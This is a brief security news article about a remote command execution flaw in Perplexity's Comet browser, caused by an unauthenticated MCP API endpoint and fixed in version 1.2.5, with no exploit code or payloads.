Critical Security Flaw Discovered in Perplexity Comet Browser

A significant security vulnerability was discovered in Perplexity’s Comet browser, which exposed users to potential system-level attacks. The flaw was identified by security researchers who reported the findings directly to Perplexity. The vulnerability allowed for remote command execution on a user’s machine through the browser’s integrated Master Control Program (MCP) API.

The issue affected all versions of the Comet browser prior to the release of a security patch. The nature of the vulnerability meant that a user navigating to a specially crafted webpage could have their system compromised without further interaction.

Technical Details of the MCP API Exploit

The root cause of the security gap was traced to an improperly secured MCP API endpoint. This API, designed for advanced browser control, failed to implement adequate authentication and input sanitization. This oversight permitted remote websites to send and execute arbitrary commands directly on the host operating system with the same privileges as the logged-in user.

The successful exploitation of this vulnerability was demonstrated by the security team that discovered it. Their proof-of-concept confirmed that the flaw provided a direct vector for attackers to gain system-level access, bypassing standard security protocols of the operating system.

Perplexity Issues Urgent Patch and Advisory

In response to the disclosure, Perplexity acknowledged the severity of the vulnerability. The company’s development team promptly issued a security update to address the issue. The patch was released in Comet browser version 1.2.5.

Perplexity has issued a formal security advisory urging all users of the Comet browser to update to the latest version immediately. The update rectifies the API’s security failings, effectively closing the vector for this specific system-level attack. No user data was reported as compromised as a direct result of this vulnerability before the patch was deployed.

Source: https://www.helpnetsecurity.com/2025/11/20/perplexity-comet-browser-security-mcp-api/